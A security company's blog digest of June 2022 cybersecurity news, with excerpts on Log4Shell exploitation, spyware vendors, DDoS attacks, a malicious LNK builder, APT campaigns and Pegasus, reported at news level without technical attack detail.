June 24, 2022

Fortify Security Team
Jun 24, 2022

Title: Scalper Bots out of Control in Israel, Selling State Appointments
Date Published: June 23, 2022

https://www.bleepingcomputer.com/news/security/scalper-bots-out-of-control-in-israel-selling-state-appointments/

Excerpt: “Out-of-control scalper bots have created havoc in Israel by registering public service appointments for various government services and then offering to sell them to disgruntled citizens.
The bot’s operators attempted to sell appointments for a range of government agencies for over $100, including passport renewal, the Israeli Ministry of Interior, the Ministry of Transport, National Insurance, Israel Post, and the Israeli state Electricity Company.”

Title: CISA: Log4Shell Exploits Still Being Used to Hack VMware Servers
Date Published: June 23, 2022

https://www.bleepingcomputer.com/news/security/cisa-log4shell-exploits-still-being-used-to-hack-vmware-servers/

Excerpt: “CISA warned today that threat actors, including state-backed hacking groups, are still targeting VMware Horizon and Unified Access Gateway (UAG) servers using the Log4Shell (CVE-2021-44228) remote code execution vulnerability. Attackers can exploit Log4Shell remotely on vulnerable servers exposed to local or Internet access to move laterally across networks until they gain access to internal systems containing sensitive data. After its disclosure in December 2021, multiple threat actors began scanning for and exploiting unpatched systems, including state-backed hacking groups from China, Iran, North Korea, and Turkey, as well as several access brokers commonly used by ransomware gangs.”

Title: Spyware Vendor Works With ISPs to Infect iOS and Android Users
Date Published: June 23, 2022

https://www.bleepingcomputer.com/news/security/spyware-vendor-works-with-isps-to-infect-ios-and-android-users/

Excerpt: “Google’s Threat Analysis Group (TAG) revealed today that RCS Labs, an Italian spyware vendor, has received help from some Internet service providers (ISPs) to infect Android and iOS users in Italy and Kazakhstan with commercial surveillance tools. RCS Labs is just one of more than 30 spyware vendors whose activity is currently tracked by Google, according to Google TAG analysts Benoit Sevens and Clement Lecigne. During attacks that used drive-by-downloads to infect multiple victims, the targets were prompted to install malicious apps (camouflaged as legitimate mobile carrier apps) to get back online after their Internet connection was cut with the help of their ISP.”

Title: Lithuania Warns of Rise in DDoS Attacks Against Government Sites
Date Published: June 23, 2022

https://www.bleepingcomputer.com/news/security/lithuania-warns-of-rise-in-ddos-attacks-against-government-sites/

Excerpt: “The National Cyber Security Center (NKSC) of Lithuania has issued a public warning about a steep increase in distributed denial of service (DDoS) attacks directed against public authorities in the country. DDoS is a special type of cyberattack that causes internet servers to be overwhelmed by a large number of requests and garbage traffic, rendering the hosted sites and services inaccessible for legitimate visitors and users. According to NKSC, due to these cyberattacks, Lithuania’s transportation agencies, financial institutions, and other large entities have experienced temporary service disruptions.”

Title: Malicious Windows ‘LNK’ Attacks Made Easy with New Quantum Builder
Date Published: June 23, 2022

https://www.bleepingcomputer.com/news/security/malicious-windows-lnk-attacks-made-easy-with-new-quantum-builder/

Excerpt: “Malware researchers have noticed a new tool that helps cybercriminals build malicious .LNK files to deliver payloads for the initial stages of an attack. LNKs are Windows shortcut files that can contain malicious code to abuse legitimate tools on the system, the so-called living-off-the-land binaries (LOLBins), such as PowerShell or the MSHTA that is used to execute Microsoft HTML Application (HTA) files. Due to this, LNKs are extensively used for malware distribution, especially in phishing campaigns, with some notable malware families currently using them being Emotet, Bumblebee, Qbot, and IcedID.”

Title: June Windows Preview Updates Fix VPN, RDP, RRAS, and Wi-Fi Issues
Date Published: June  24, 2022

https://www.bleepingcomputer.com/news/microsoft/june-windows-preview-updates-fix-vpn-rdp-rras-and-wi-fi-issues/

Excerpt: “The optional Windows update previews released by Microsoft this week come with more than the regular performance improvements and bug fixes. Redmond published three cumulative updates as part of its scheduled June 2022 monthly “C” updates to allow customers to test upcoming fixes: KB5014668 (Windows 11), KB5014665 (Windows Server 2022), and KB5014669 (Windows 10, version 1809). However, as the company revealed on Thursday in the Windows health dashboard [1, 2, 3], the updates also address connectivity issues when using Wi-Fi hotspots after installing Windows updates released as part of the June 2022 Patch Tuesday.”

Title: How Companies are Prioritizing Infosec and Compliance
Date Published: June  24, 2022

https://www.helpnetsecurity.com/2022/06/24/companies-infosec-compliance-priorities/

Excerpt: “New research conducted by Enterprise Management Associates (EMA), examines the impact of the compliance budget on security strategy and priorities. It describes areas for which companies prioritize information security and compliance, which leaders control information security spending, how compliance has shifted the overall security strategy of the organization, and the solutions and tools on which organizations are focusing their technology spending. The findings cover three critical areas of an organization’s security and compliance posture: information security and IT audit and compliance, data security and data privacy, and security and compliance spending.”

Title: Chinese Tropic Trooper APT Spreads a Hacking Tool Laced with a Backdoor
Date Published: June 23, 2022

https://securityaffairs.co/wordpress/132545/hacking/tropic-trooper-apt-new-campaign.html

Excerpt: “Check Point Research uncovered an activity cluster with ties to China-linked APT Tropic Trooper (aka Earth Centaur, KeyBoy, and Pirate Panda) which involved the use of a previously undescribed loader (dubbed “Nimbda”) written in Nim language. The Tropic Trooper APT has been active at least since 2012, it was first spotted by security experts at Trend Micro in 2015, when the threat actors targeted government ministries and heavy industries in Taiwan and the military in the Philippines. Nimbda works by injecting a piece of code into a launched notepad.exe process, it allows operators to to start a three-tier infection chain. The final payload encoded in the image is TClient, which is a backdoor that was used by the Tropic Trooper APT group in past campaigns.”

Title: NSO Group Told Lawmakers that Pegasus Spyware was Used by at Least 5 European Countries
Date Published: June 23, 2022

https://securityaffairs.co/wordpress/132536/malware/nso-group-pegasus-5-eu-countries.html

Excerpt: “The controversial Israeli surveillance vendor NSO Group told the European Union lawmakers that its Pegasus spyware was used by at least five countries in the region. NSO Group’s General Counsel Chaim Gelfand admitted that the company had “made mistakes,” but that after the abuses of its software made the headlines it has canceled several contracts. In April, the Parliament set up a new inquiry committee investigating the use of Pegaus spyware and equivalent surveillance software used to spy of phones belonging to politicians, diplomats, and civil society members. The spyware was used to target several European leaders, including Spain’s Prime Minister Pedro Sánchez, and Spanish political groups, Hungary, and Poland.”

Title: Russia Steps Up Cyber-Espionage Against Ukraine Allies
Date Published: June 23, 2022

https://www.infosecurity-magazine.com/news/russia-cyberespionage-against/

Excerpt: “Russian state-backed hackers have conducted network penetration and espionage activities against 128 organizations in 42 countries allied to Ukraine since the start of the war, according to Microsoft. Aside from the US, which is Russia’s number one target, campaigns have also focused on Poland, which is where much military and humanitarian assistance is being coordinated, according to the tech giant’s president, Brad Smith. The Baltic countries as well as Denmark, Norway, Finland, Sweden, and Turkey have also been targets, with governments and foreign ministries in particular singled out, he claimed.”

Recent Posts

July 27, 2022

Title: Phishing Attacks Skyrocket With Microsoft and Facebook as Most Abused Brands Date Published: July 26, 2022 https://threatpost.com/popular-bait-in-phishing-attacks/180281/ Excerpt: “The bloom is back on phishing attacks with criminals doubling down on fake...

July 26, 2022

Title: Nist Updates Healthcare Security Guidance Date Published: July 25, 2022 https://www.infosecurity-magazine.com/news/nist-healthcare-guidance/ Excerpt: “The National Institute of Standards and Technology (NIST) has updated its cybersecurity guidance for...

July 25, 2022

Title: Lockbit Ransomware Gang Claims to Have Breached the Italian Revenue Agency Date Published: July 25, 2022 https://securityaffairs.co/wordpress/133640/cyber-crime/lockbit-ransomware-italian-revenue-agency.html Excerpt: “The ransomware gang Lockbit claims to have...

July 22, 2022

Title: Hackers for Hire: Adversaries Employ ‘Cyber Mercenaries’ Date Published: July 21, 2022 https://threatpost.com/hackers-cyber-mercenaries/180263/ Excerpt: “A for-hire cybercriminal group is feeling the talent-drought in tech just like the rest of the sector and...

July 21, 2022

Title: Windows 11 Now Blocks Rdp Brute-Force Attacks by Default Date Published: July 21, 2022 https://www.bleepingcomputer.com/news/microsoft/windows-11-now-blocks-rdp-brute-force-attacks-by-default/ Excerpt: “Recent Windows 11 builds come with the Account Lockout...

July 20, 2022

Title: New Luna Ransomware Encrypts Windows, Linux, and Esxi Systems Date Published: July 20, 2022 https://www.bleepingcomputer.com/news/security/new-luna-ransomware-encrypts-windows-linux-and-esxi-systems/ Excerpt: “A new ransomware family dubbed Luna can be used to...

July 18, 2022

Title: A Massive Cyberattack Hit Albania Date Published: July 18, 2022 https://securityaffairs.co/wordpress/133363/cyber-warfare-2/albania-cyber-attack.html Excerpt: “Albania was hit by a massive cyberattack over the weekend, the government confirmed on Monday. A...